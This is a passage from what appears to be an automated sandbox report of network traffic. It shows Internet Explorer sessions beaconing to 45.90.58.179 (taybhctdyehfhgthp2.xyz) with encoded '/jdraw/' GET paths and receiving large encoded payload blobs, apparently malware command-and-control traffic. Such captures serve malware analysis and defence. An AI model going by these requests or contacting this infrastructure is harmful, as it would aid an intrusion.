Jul 6, 2021 14:31:25.193569899 CEST	12190	IN	Data Raw: 64 50 45 59 6d 75 63 65 58 56 75 2b 65 73 4c 50 47 68 2b 6e 77 61 65 6f 59 61 39 46 30 52 52 75 50 53 30 50 71 6a 70 6d 51 77 7a 35 49 4f 74 72 4d 30 31 66 70 71 51 30 67 4a 6e 56 31 73 72 4e 53 33 7a 4d 65 70 59 35 6b 58 67 57 56 44 37 6f 64 2b Data Ascii: dPEYmuceXVu+esLPGh+nwaeoYa9F0RRuPS0PqjpmQwz5IOtrM01fpqQ0gJnV1srNS3zMepY5kXgWVD7od+CbrqOwkR/oeaJwkXtQawDvDLXVjfJwBFfn/9z8ZKBvj5ql3TqU+OXaaM2TEnn8sirqG9ZSopwcY09CSMCNEM25pEDDXHyka8ktDmpOhVq1tEW3/uPqk2piO0hKU3aPiY+e8bshNXDXXiBL0e3hF9fArYaTroGybTW
Jul 6, 2021 14:31:25.193591118 CEST	12192	IN	Data Raw: 39 52 69 52 45 66 39 43 67 46 56 6e 68 70 39 4c 79 6a 2f 37 72 50 4c 75 2f 59 4f 41 4b 39 4f 42 65 58 2b 54 43 6d 74 68 6a 39 54 48 51 44 62 6d 36 41 45 48 58 48 35 4b 6c 34 50 59 58 73 6d 63 4c 46 6d 79 6a 39 4d 62 4e 63 36 42 73 37 69 51 46 4b Data Ascii: 9RiREf9CgFVnhp9Lyj/7rPLu/YOAK9OBeX+TCmthj9THQDbm6AEHXH5Kl4PYXsmcLFmyj9MbNc6Bs7iQFKFzGWFcamhuY/YF/7bKjK1s7JRXcdUGiSMQXVC2+ydj48vE+TgqUgt3LLwMVwm6zsBUlKNiqzOnDhITfuYYHqYPy5RfC5dNzEnVcWLINxRdIwpWSMDjosAxHYJ6z5J9yBaiQKzqDc83j8nSRFwMi/ya7pJoHk41szF
Jul 6, 2021 14:31:25.193618059 CEST	12193	IN	Data Raw: 70 6c 39 2b 37 5a 57 31 35 74 58 63 45 79 46 62 52 73 64 67 30 54 63 56 6c 7a 7a 35 45 4a 65 64 48 73 78 58 43 78 4b 77 73 2b 75 37 42 6f 43 6c 46 68 2b 59 4e 6d 68 46 39 44 2b 77 72 78 44 43 48 63 65 74 77 32 47 5a 31 49 2f 32 41 55 35 45 56 2b Data Ascii: pl9+7ZW15tXcEyFbRsdg0TcVlzz5EJedHsxXCxKws+u7BoClFh+YNmhF9D+wrxDCHcetw2GZ1I/2AU5EV+g+SETloCBLto19Crb5vVqDz6/QVn2Kuyw3n7rqUuMBQprwF+wMgjbtbZKWQmvjxUkqve0LOpwcO3eYFgmYz9RFSkR6eCsTGTEA5HWR4oBVx0JosioSwKVmVjKacKHUDlsYWnGKr8QM40rg1JbkpSUZ2annA+GPee2
Jul 6, 2021 14:31:25.193639040 CEST	12195	IN	Data Raw: 6e 52 72 54 31 51 5a 4b 63 38 43 42 4a 50 2f 62 73 4b 75 65 64 77 75 43 36 46 6c 54 46 72 32 47 76 34 41 73 4c 6a 53 30 47 61 51 57 78 5a 54 4b 59 68 41 63 64 71 33 30 35 58 42 5a 37 6b 61 33 39 45 64 6e 68 4e 57 52 77 46 2b 77 5a 66 5a 2b 2b 4e Data Ascii: nRrT1QZKc8CBJP/bsKuedwuC6FlTFr2Gv4AsLjS0GaQWxZTKYhAcdq305XBZ7ka39EdnhNWRwF+wZfZ++N4+L5wafyW44f5c24ppMIjUNcb2b2kx5GtPXiZ0X9/PJ8W5qKPlE8aNDdAINLxYUGlvFx8RkRsU6fWzM6rOKW1QpveU81D3HqBBUWMQr5hYrRc4E8X7r/DalFZinLcVJbupgy6EpMBhAL8+Q1jIw5JsG21NXDBSTQJ
Jul 6, 2021 14:31:25.193656921 CEST	12196	IN	Data Raw: 34 63 58 67 48 6b 39 59 4d 65 2b 63 55 46 53 77 72 44 2f 2b 38 37 44 58 66 35 59 46 44 62 30 46 7a 68 45 53 6b 51 55 7a 4d 34 30 46 45 45 52 2f 6e 4c 42 63 77 64 6b 38 6e 4f 45 45 74 68 43 43 49 32 5a 48 48 67 5a 48 31 39 58 57 69 6c 75 76 67 43 Data Ascii: 4cXgHk9YMe+cUFSwrD/+87DXf5YFDb0FzhESkQUzM40FEER/nLBcwdk8nOEEthCCI2ZHHgZH19XWiluvgC5Yy2b3vU4Zkxi6licf0HHG3OhcPEBKQZPaT09yhKrXUZhWhKJ3K//SICSWhyiRZv1q2bbJC/eJj9SaYG3v2oeC82bkNPi7xA/F3cOqIfgQPXXRdKUheZDaZd9aD7yC3xGy5CINHFPNHBkxhh4WvlB87hj4yo0WBhp
Jul 6, 2021 14:31:25.193675995 CEST	12197	IN	Data Raw: 63 56 72 69 68 7a 32 2f 69 4c 65 5a 38 4b 36 37 4c 64 4b 55 61 64 76 6b 5a 42 56 6f 55 74 6b 4d 65 42 78 6f 71 44 68 76 36 73 56 79 2f 75 6b 4b 32 74 4a 35 4d 55 66 4f 39 76 48 58 69 30 33 48 37 4f 43 74 35 65 47 75 58 41 31 50 73 7a 32 77 36 57 Data Ascii: cVrihz2/iLeZ8K67LdKUadvkZBVoUtkMeBxoqDhv6sVy/ukK2tJ5MUfO9vHXi03H7OCt5eGuXA1Psz2w6WSl4zjnD9KBaBC5vxnH2xYp4sKkBzrAlSiB0hD4xZaXiizkIr9AZ268XkAojA1/rTaSXPHfZBIDCErsVQy95w55MXAqqTOKT0qHf9VX+n3tQ9guHT+7A5j4SjSHjV74bt+0eT2VnS0pVjE5YXAFkMGpBVlwGZ1WRcn
Jul 6, 2021 14:31:25.193692923 CEST	12199	IN	Data Raw: 47 56 7a 4a 6b 4c 6a 4c 34 70 49 4b 54 36 45 36 6f 38 41 36 4d 75 76 30 69 65 75 31 7a 38 4c 76 69 64 30 6c 32 6b 57 79 56 42 70 51 6b 57 56 61 33 73 35 6d 64 53 2b 4c 42 41 6b 49 79 56 36 57 4b 41 2b 59 52 6d 53 79 4b 72 74 6b 6c 6f 71 56 62 4d Data Ascii: GVzJkLjL4pIKT6E6o8A6Muv0ieu1z8Lvid0l2kWyVBpQkWVa3s5mdS+LBAkIyV6WKA+YRmSyKrtkloqVbMFwodpAOW/17xA+ABmBP4QRre1Bl+WwYgmK6mz5whN5Jn0FXZcOJB7HeBB218JKD2uCM5s/sMqwYO980SaHLq93uHuGBv/c0hVmTq2rb8jLHOb5xWOdjcRrWgruDJIZEJozZN26qQC3KaUJnM97d647k2Y+9tX2dLD
Jul 6, 2021 14:31:25.193756104 CEST	12200	IN	Data Raw: 72 47 68 62 53 59 4b 55 42 41 62 59 7a 35 6e 68 34 56 2f 4f 72 6a 71 69 70 4b 45 74 53 78 42 6c 64 30 50 55 68 4c 61 56 2b 79 43 6b 73 74 45 6f 79 48 37 32 48 70 43 42 33 64 47 4d 61 4c 2b 42 48 6f 2f 62 30 33 31 49 4c 34 2f 61 48 62 62 39 2b 67 Data Ascii: rGhbSYKUBAbYz5nh4V/OrjqipKEtSxBld0PUhLaV+yCkstEoyH72HpCB3dGMaL+BHo/b031IL4/aHbb9+gcn8tMj8SxjCDTVgPdfSOnaJVT4tEA2TcN9hLdu38YA6gWMi0V6QhLhI+qjY09dNXDav+CVarPbgfxA+7/FNtxe9eDsCMEt2fMc532NEC9aC7r/oZJsAnKMAOHGAP6wOFji0jlT1djOT9rZGS9/N5mfIQBGJlOEFgW
Jul 6, 2021 14:31:25.230849981 CEST	12201	IN	Data Raw: 53 73 34 6d 53 6d 61 6e 75 7a 6c 7a 6e 36 4e 47 71 66 48 63 35 57 62 67 38 56 6d 65 43 54 55 4e 49 78 35 38 50 74 68 56 5a 47 6e 2f 4d 54 48 6a 54 33 48 37 54 2b 46 35 4d 78 32 5a 66 38 48 6c 36 41 67 4e 43 73 38 37 33 33 75 72 70 4a 6d 56 2b 2f Data Ascii: Ss4mSmanuzlzn6NGqfHc5Wbg8VmeCTUNIx58PthVZGn/MTHjT3H7T+F5Mx2Zf8Hl6AgNCs8733urpJmV+/zFvVB20ClxCA7qbHp5CmusewLKhxaV3Fvr3DtqcGJ4mg2wbTKrD2+obxzC+uJ3ROCnRLYkHF+UPnCdakLarcp9X+idnKSjXVa613r4gI+d4eBOeyaczPaIFGjAtHmfRINSaG44JnaD+RgTyLdAMNUbPE7KLFqRax/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49894	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:30.238924980 CEST	12445	OUT	GET /jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:30.297597885 CEST	12446	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 61 33 31 34 0d 0a 67 72 57 41 4c 4a 30 41 6f 52 72 79 4d 68 4c 6b 62 34 2b 35 66 4b 46 31 42 54 33 44 6c 56 75 33 6a 75 7a 45 48 61 77 2f 5a 76 53 45 53 6d 51 76 58 51 38 6e 6b 70 30 59 39 52 6b 64 57 67 69 7a 31 69 4f 4b 31 44 38 4e 55 72 39 69 5a 64 73 64 46 72 38 31 4a 6d 70 57 67 39 74 78 6e 64 7a 56 47 54 30 65 36 2b 54 42 59 51 45 66 63 65 50 51 59 6e 6f 75 51 33 6e 45 5a 54 63 44 75 52 54 63 56 56 4b 70 34 4d 76 79 6f 41 45 37 36 67 44 5a 59 5a 62 31 55 37 54 4f 36 67 57 46 35 78 47 61 45 59 44 50 52 68 58 36 4b 75 42 45 44 4c 6e 70 4b 4a 59 4e 78 6e 5a 2f 70 73 6b 35 5a 2f 78 69 72 55 51 75 71 72 35 6e 51 38 64 43 77 62 76 6e 49 61 2f 44 67 44 59 66 35 43 6a 67 64 73 77 6b 67 72 72 48 6f 34 71 30 37 6d 36 41 65 39 6d 42 2b 53 46 34 4c 36 71 4d 35 56 2b 67 77 30 61 33 4c 70 65 4b 54 75 57 53 79 33 31 6c 6f 76 6f 31 38 44 36 63 43 5a 49 66 4e 4d 30 79 4d 73 41 71 51 6a 78 44 57 30 59 61 53 79 56 65 4d 54 6a 75 36 74 76 76 59 79 35 6d 55 62 75 73 61 70 37 57 49 6d 41 57 6d 61 67 48 4b 6e 30 51 43 52 59 52 33 37 64 49 32 6e 73 70 58 31 44 4f 52 73 2b 31 35 51 62 71 62 4c 4f 77 73 67 4c 63 64 66 65 56 36 6b 77 63 48 44 68 64 34 70 4d 4c 4c 70 73 31 71 6c 41 49 53 4f 52 51 52 32 4b 34 44 36 4a 59 6c 38 58 71 31 4f 37 4b 55 67 75 73 4d 2b 72 4d 63 51 6c 39 76 42 6f 45 54 6a 39 70 53 74 68 61 70 39 32 41 6a 6e 52 76 69 7a 32 74 6e 44 2f 32 55 73 72 74 63 30 78 6c 32 5a 34 59 71 37 6d 30 62 6c 7a 59 4d 46 65 36 75 75 61 72 79 65 45 70 4a 64 50 50 42 61 4c 36 77 67 55 7a 39 72 7a 74 58 78 45 70 47 46 53 61 68 72 6c 33 4c 39 73 34 57 2f 36 57 30 66 47 56 4f 7a 6d 61 30 56 56 62 46 61 55 6d 47 32 45 79 51 7a 52 52 66 6f 42 6e 77 56 54 47 6c 76 51 45 31 71 5a 35 73 39 4d 6c 73 2b 53 79 42 6f 31 2f 35 33 68 6b 59 5a 70 31 6e 2f 4a 6a 46 78 6f 46 38 64 44 34 47 6b 77 72 37 4b 61 56 6a 77 35 35 4e 63 56 79 48 72 4d 49 7a 77 6a 45 6a 39 30 42 76 71 31 50 4a 6a 64 78 56 77 79 33 31 58 70 4a 6f 57 54 35 44 68 6e 2f 73 46 44 63 37 33 4f 31 65 59 71 47 58 4f 4a 37 66 73 2f 4e 33 61 62 44 2f 33 65 4b 63 7a 50 2b 73 66 71 70 70 53 77 39 59 67 54 52 6f 53 32 2f 7a 31 6b 71 51 4f 44 55 7a 41 43 75 70 49 34 66 63 52 63 57 43 6e 70 74 38 69 49 4a 45 7a 4d 48 45 39 6f 78 63 33 6e 66 62 67 47 6a 6d 39 6b 69 44 55 78 6a 58 55 79 67 44 61 59 6c 49 44 73 63 2f 45 39 52 51 47 41 4e 4e 6f 4b 45 67 6a 4c 50 45 47 56 73 64 74 57 45 48 63 6f 2b 33 75 34 5a 59 38 33 72 77 79 6e 4e 30 76 61 43 46 4e 4f 36 72 48 35 36 7a 6a 45 49 53 78 48 73 56 6a 6a 61 6e 6d 64 63 47 31 57 61 50 66 48 43 67 33 79 32 68 71 69 6c 54 61 58 46 37 2b 54 76 70 38 76 5a 72 35 4c 75 65 35 69 30 6c 46 53 6c 46 47 62 48 63 59 59 6c 44 44 55 4a 37 51 33 71 6c 6b 70 77 66 74 50 65 53 54 68 6b 30 61 66 65 72 30 47 77 6d 42 6f 47 48 58 73 41 42 51 57 33 79 50 4b 73 4f 61 33 57 37 79 2f 33 6a 79 62 55 53 6f 50 4e 76 4e 72 69 57 46 2f 65 44 30 61 71 63 6f 46 37 41 38 Data Ascii: 4a314grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgiz1iOK1D8NUr9iZdsdFr81JmpWg9txndzVGT0e6+TBYQEfcePQYnouQ3nEZTcDuRTcVVKp4MvyoAE76gDZYZb1U7TO6gWF5xGaEYDPRhX6KuBEDLnpKJYNxnZ/psk5Z/xirUQuqr5nQ8dCwbvnIa/DgDYf5CjgdswkgrrHo4q07m6Ae9mB+SF4L6qM5V+gw0a3LpeKTuWSy31lovo18D6cCZIfNM0yMsAqQjxDW0YaSyVeMTju6tvvYy5mUbusap7WImAWmagHKn0QCRYR37dI2nspX1DORs+15QbqbLOwsgLcdfeV6kwcHDhd4pMLLps1qlAISORQR2K4D6JYl8Xq1O7KUgusM+rMcQl9vBoETj9pSthap92AjnRviz2tnD/2Usrtc0xl2Z4Yq7m0blzYMFe6uuaryeEpJdPPBaL6wgUz9rztXxEpGFSahrl3L9s4W/6W0fGVOzma0VVbFaUmG2EyQzRRfoBnwVTGlvQE1qZ5s9Mls+SyBo1/53hkYZp1n/JjFxoF8dD4Gkwr7KaVjw55NcVyHrMIzwjEj90Bvq1PJjdxVwy31XpJoWT5Dhn/sFDc73O1eYqGXOJ7fs/N3abD/3eKczP+sfqppSw9YgTRoS2/z1kqQODUzACupI4fcRcWCnpt8iIJEzMHE9oxc3nfbgGjm9kiDUxjXUygDaYlIDsc/E9RQGANNoKEgjLPEGVsdtWEHco+3u4ZY83rwynN0vaCFNO6rH56zjEISxHsVjjanmdcG1WaPfHCg3y2hqilTaXF7+Tvp8vZr5Lue5i0lFSlFGbHcYYlDDUJ7Q3qlkpwftPeSThk0afer0GwmBoGHXsABQW3yPKsOa3W7y/3jybUSoPNvNriWF/eD0aqcoF7A8
Jul 6, 2021 14:31:30.297622919 CEST	12448	IN	Data Raw: 6c 78 63 44 32 47 56 63 61 36 54 4d 71 37 71 45 4a 45 6c 61 34 2b 50 55 76 34 6f 56 47 72 2f 78 32 67 77 72 79 32 69 75 4f 69 67 35 4f 36 2b 72 59 31 6e 53 34 46 74 79 61 54 71 5a 43 48 76 6f 31 6f 78 41 6f 43 36 32 44 62 48 4f 33 50 33 30 42 4c Data Ascii: lxcD2GVca6TMq7qEJEla4+PUv4oVGr/x2gwry2iuOig5O6+rY1nS4FtyaTqZCHvo1oxAoC62DbHO3P30BLghab//RvG9hkoVKtvUlf1dUfd/hFWNGLhQz9wnvaRsWtj0TveHk1mxLCbBq9qT9iZKYtFlcANnmzhxYXKJr7Qh7YnL3wanaF8xRzB0cBHcnYqzEDKRn/+h5NzRMklbkLP9dcsrxNWX2E8FgZrNX99blk+rAt+eSJy
Jul 6, 2021 14:31:30.297645092 CEST	12449	IN	Data Raw: 67 54 58 34 34 41 75 50 4d 36 34 66 56 45 49 4c 78 54 56 49 32 68 78 59 37 4e 44 62 68 6e 53 6d 65 44 70 61 33 65 77 44 38 30 44 33 6c 50 35 72 4f 68 6b 68 38 6e 42 30 67 62 64 35 42 4a 37 72 44 49 73 45 59 72 71 74 4a 72 6b 72 30 74 58 49 33 66 Data Ascii: gTX44AuPM64fVEILxTVI2hxY7NDbhnSmeDpa3ewD80D3lP5rOhkh8nB0gbd5BJ7rDIsEYrqtJrkr0tXI3f76TkOqKK8+XfqzUd6WsZvh07ElCb+UyD65n8N+NDwGOIwt/xp7rtZuunoVrkz+e1KZEHYuxlDgISMWMU3OBX4KOqL3C5T0V//4eYYBcIhnBaag/I9/pQwUJfr4KXB3N4p3P4Pf5cg0+SUGiD0GqNIP/wC1QaLUQrl
Jul 6, 2021 14:31:30.297665119 CEST	12450	IN	Data Raw: 45 6c 4b 71 41 61 43 7a 64 4f 33 64 33 4f 48 73 46 6f 4d 58 4d 51 73 2b 38 64 35 2f 46 78 39 5a 6d 64 71 41 62 75 2f 4a 68 4b 44 48 32 47 31 34 49 36 6f 76 51 58 70 6b 42 34 67 6f 44 65 4b 6c 5a 6e 65 4c 34 4c 48 47 4e 73 57 57 54 46 51 38 64 75 Data Ascii: ElKqAaCzdO3d3OHsFoMXMQs+8d5/Fx9ZmdqAbu/JhKDH2G14I6ovQXpkB4goDeKlZneL4LHGNsWWTFQ8dunZX+zXvxtQ8ZIAm0RdtWSPfmU8H+MqIfvLRq17/X8IWIo73/Oyi0zVXeSHJooo40JIzxNxmboREY/8lyErZvgDhHbXcwmys/MUghOhvpwwlDUkoJTQm+e0YcHyMIMgbBHIPDEIODzlqZ2aYLk/HCSx8zq/DZoODWj
Jul 6, 2021 14:31:30.297681093 CEST	12452	IN	Data Raw: 57 72 79 52 45 2f 4e 30 2b 6b 61 72 77 56 48 45 6e 70 69 5a 63 7a 6a 67 74 51 57 32 7a 4d 46 48 47 50 50 74 33 7a 37 61 65 77 30 46 4c 34 62 68 39 72 44 2b 54 4d 54 69 32 77 54 5a 55 6c 48 4e 4c 41 58 35 4f 72 48 43 78 30 50 4c 54 71 6c 6e 71 41 Data Ascii: WryRE/N0+karwVHEnpiZczjgtQW2zMFHGPPt3z7aew0FL4bh9rD+TMTi2wTZUlHNLAX5OrHCx0PLTqlnqAcOxSiHPN5MS9hyi9JwrV21NTuZkOPBH1kMSxOBiyxgJZmX6M1UvFBNjBmXFjA0yY5hFM9fvaMDA9Bxv6ETkIJbBkoUgzm7hStpnLWD/YBoE30sWHD+WiHtcVoaupUe5XusTrWI1wf4fwK8j3RhESxHcHX8CZb+lED
Jul 6, 2021 14:31:30.297693014 CEST	12453	IN	Data Raw: 35 5a 2b 43 4e 37 6d 73 6b 48 7a 70 79 50 44 4e 75 4c 68 67 48 31 59 44 45 47 65 69 4c 68 32 78 52 48 56 35 78 48 45 48 71 41 35 4e 56 4b 79 38 67 32 35 4e 66 66 6c 36 63 46 6d 4e 56 6f 42 4c 70 30 32 35 73 62 6f 73 61 63 36 75 48 36 6e 4b 39 44 Data Ascii: 5Z+CN7mskHzpyPDNuLhgH1YDEGeiLh2xRHV5xHEHqA5NVKy8g25Nffl6cFmNVoBLp025sbosac6uH6nK9DkEdHaDceK3scDeDcd1bZUYoO/j5tMgB1kOHdsIHILi6/hnW5ceouM8zuyDaL4W/lcEvDLTQucCFvZ7G1XL7fytejcD//xlHJ2EV6QXWLAyFaS2cj1+UgqRmDMtKlBZW16nCYDOdopSItXMfBJVDovsIe4t7xpu/tA
Jul 6, 2021 14:31:30.297704935 CEST	12455	IN	Data Raw: 44 36 71 66 30 6b 75 4e 46 68 4c 75 63 4a 2b 30 50 43 36 74 35 67 6e 5a 34 42 46 45 41 33 58 71 74 4e 31 4e 37 59 49 75 39 48 5a 4b 73 62 39 57 38 72 37 34 30 4a 77 56 6d 55 4b 6d 41 58 66 6e 36 67 62 57 33 6a 57 61 45 4b 71 5a 35 55 4a 35 62 35 Data Ascii: D6qf0kuNFhLucJ+0PC6t5gnZ4BFEA3XqtN1N7YIu9HZKsb9W8r740JwVmUKmAXfn6gbW3jWaEKqZ5UJ5b589F+hAD4qCwoqpOfGiRUsPZOXquWknnUPMh/UMxkG5XygSNHPIlPQf0KBO59FwzPCWCqvM8qAy7JqBzAmwQs0OYppXZCvZM69UaT929q8e42bBdTt5kbfi96lQ7k5soBqFf3veVQEajzauWHinoVxqRJi+OSRAHse
Jul 6, 2021 14:31:30.297717094 CEST	12456	IN	Data Raw: 6a 72 4c 46 44 76 4e 4b 67 6a 49 42 33 76 4e 61 4e 36 4c 7a 6a 59 41 55 64 67 39 6a 39 6d 30 54 68 34 74 4b 2b 73 4d 57 65 43 6e 48 50 42 6c 54 43 7a 77 42 54 79 33 64 72 34 5a 71 37 75 45 66 32 67 54 33 57 61 58 2b 75 51 44 33 31 75 7a 6e 46 39 Data Ascii: jrLFDvNKgjIB3vNaN6LzjYAUdg9j9m0Th4tK+sMWeCnHPBlTCzwBTy3dr4Zq7uEf2gT3WaX+uQD31uznF9UOsircDJQANKO0d82TKV+OaPW/0az5prwH1r3kFXPHqb3YZFmRfocn21t36MUXYNaFR+k14L7CRuWnfSZxkSxAQGsxXtxFOvMPuDSXa+bq4SRZV4kPJQDKUTiCGi8dwdtCnteI2zM+eMz6+TKJalUkPlWkfdZm5gQ
Jul 6, 2021 14:31:30.297729015 CEST	12457	IN	Data Raw: 49 6b 4c 6f 52 4a 67 6d 69 7a 63 64 34 69 36 47 4e 66 71 44 79 38 47 58 79 4c 48 4a 43 71 64 31 73 61 63 4f 32 51 76 77 62 58 59 78 44 4c 38 52 54 53 4c 44 68 7a 2f 4a 55 6b 70 4f 42 35 47 32 44 65 4a 6d 4a 75 38 61 42 72 66 4d 6d 73 33 38 34 53 Data Ascii: IkLoRJgmizcd4i6GNfqDy8GXyLHJCqd1sacO2QvwbXYxDL8RTSLDhz/JUkpOB5G2DeJmJu8aBrfMms384SXz5cBHV5i5Ba+8kAifi1l9/0Dg/MfoeaDzlhOk+o9g49hr/JBwAWj3HoiQowJfLcDm9Elomg8pODpgexMW9sXcUymehnqGz9G1zxS79+sdD4IP8wPtQmEnYLbxtID/Fl09Xn5abf73KLV31gWDkr0OJ20EDwcWczK
Jul 6, 2021 14:31:30.297744036 CEST	12459	IN	Data Raw: 65 74 7a 49 68 35 67 59 63 70 66 57 2f 48 4c 33 63 67 41 36 44 61 72 4e 53 56 75 6d 72 6b 59 67 50 51 44 45 51 36 79 4e 79 68 44 5a 50 64 55 6a 48 61 4d 6d 42 4f 2b 30 47 69 6a 53 51 39 5a 50 69 46 63 68 48 66 36 51 61 70 63 69 53 70 49 45 31 42 Data Ascii: etzIh5gYcpfW/HL3cgA6DarNSVumrkYgPQDEQ6yNyhDZPdUjHaMmBO+0GijSQ9ZPiFchHf6QapciSpIE1BxMU55qQm1QwQKY1xGtx9wSooSO1eApcBb2SybgCzjEfTJoYm2GoxBt+g5E7vxPfCX8Lz2KXylMKTD8bTn2zf2VU/pZtu8FDBW+CahSAvMKto5T+CXe4XUKbcebC1DkR1RUIEntenwJoIob30WZRkvqaWDDKmQLLZp
Jul 6, 2021 14:31:30.334815025 CEST	12460	IN	Data Raw: 64 48 44 76 77 46 55 30 39 77 51 59 54 50 48 6d 64 37 7a 49 58 78 36 74 5a 2b 64 68 6e 4c 4b 70 71 64 6f 51 6c 4a 52 45 50 55 54 43 53 42 61 62 67 50 6b 54 6f 66 79 47 32 61 45 4a 6c 6a 67 68 55 42 5a 57 49 49 52 68 49 4a 71 74 34 63 63 68 77 2f Data Ascii: dHDvwFU09wQYTPHmd7zIXx6tZ+dhnLKpqdoQlJREPUTCSBabgPkTofyG2aEJljghUBZWIIRhIJqt4cchw/qm5g4a34BSbj4qhHspzEAyAtjrK+do97NxAKp0nqqq2kMkdEnNw/LpCY396nFbN8Er0Uh113nBF8rYBZ44JUxy0z/QwOWlAtc1pmui9lyIe2de+SXTIL5voydZlgmZ3tssMh1Bims6Ee/BcLLq6HkHE1ZOP3nrmKs

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49896	45.90.58.179	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 14:31:35.488914013 CEST	12765	OUT	GET /jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: taybhctdyehfhgthp2.xyz Connection: Keep-Alive Cookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Jul 6, 2021 14:31:35.547017097 CEST	12767	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 12:31:35 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2460 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 65 68 58 6c 64 53 77 58 51 69 59 4c 61 47 7a 6e 51 4e 35 59 46 37 72 33 4c 2f 65 66 4f 4c 62 34 4c 6e 5a 31 6f 41 59 70 74 38 6c 67 50 47 50 65 2f 67 66 38 2f 44 47 54 62 56 36 6d 37 59 77 70 55 52 33 4d 57 6f 32 55 74 4b 64 44 6d 46 34 41 50 43 46 72 61 4a 52 45 77 6c 4a 57 6e 6b 6f 62 38 53 73 51 4e 4a 68 72 79 77 76 4b 71 77 2b 62 53 6f 6f 48 59 75 77 6c 49 42 6b 6e 4f 64 73 70 58 39 45 51 65 33 53 76 39 65 2b 4d 4a 47 7a 42 55 56 30 68 61 45 44 62 61 30 58 41 6b 4f 62 75 44 59 4e 52 6a 31 38 78 6e 4e 69 58 69 36 57 73 36 30 50 6a 63 30 2f 48 55 30 69 39 62 4c 52 70 52 67 35 39 53 54 6b 55 71 46 47 73 38 43 34 31 32 48 31 78 56 64 6d 63 35 64 32 76 72 72 77 31 57 37 32 36 78 64 78 4c 4a 62 42 35 50 72 59 69 50 6f 4d 41 50 31 59 4e 39 50 2b 4b 59 7a 6d 6c 4f 56 47 4b 65 49 76 66 69 4b 79 64 4e 37 61 78 79 55 71 35 2f 77 70 67 41 53 47 2b 2f 30 71 4f 41 61 30 6f 65 53 68 35 51 36 7a 34 4c 65 39 31 58 37 6f 34 32 6a 6d 4f 51 6e 69 53 77 63 2f 41 6e 59 66 6c 6c 67 45 4c 2b 58 5a 2f 69 6f 55 59 4e 69 62 4a 56 6f 58 44 36 65 69 58 4f 6c 37 4d 4f 4b 61 70 79 31 42 62 2b 47 79 77 7a 79 38 74 50 5a 6a 34 54 6b 7a 4f 67 2f 6b 44 6f 6c 43 7a 6d 4b 73 33 50 75 62 48 4c 41 42 34 65 6a 51 45 44 2f 38 66 51 51 6b 46 71 39 50 41 69 59 78 75 70 44 6e 55 69 43 58 67 39 37 76 41 51 42 75 53 4a 73 46 6a 39 6b 37 53 62 51 66 35 6c 72 55 46 54 32 39 6f 50 58 57 41 46 4f 2b 69 76 49 39 54 4c 56 53 36 47 4d 35 56 31 56 51 37 33 4a 46 7a 34 30 48 38 57 35 6a 33 6d 4b 44 73 2b 4c 6b 39 2f 79 70 4e 53 51 52 62 45 41 69 74 6d 49 30 4c 36 39 76 2f 4f 70 79 43 5a 66 77 32 62 4c 72 33 55 4d 6a 79 51 36 6a 63 34 37 32 75 52 54 42 6a 6c 75 6b 74 59 75 4a 4b 74 4f 78 6d 6c 30 6b 46 61 4d 35 4f 51 48 61 6e 43 4b 55 46 55 44 30 5a 45 72 34 31 4f 62 4d 48 67 66 54 4c 41 2b 47 56 51 41 43 32 4d 34 69 36 6f 52 58 62 33 2f 46 44 37 4f 37 71 36 49 71 6e 75 6e 55 33 57 36 78 6f 36 46 6b 6b 77 78 4d 77 46 61 39 33 54 7a 62 49 35 6c 55 36 75 59 6e 59 2b 6b 4c 59 52 51 62 79 54 46 56 33 5a 6d 49 70 4e 70 75 2f 74 7a 50 41 32 5a 41 6b 4e 32 53 4a 74 61 54 66 4d 4f 62 71 67 57 65 69 49 56 57 5a 44 49 36 59 5a 34 50 65 6f 59 56 47 56 50 54 78 56 6f 39 7a 56 57 65 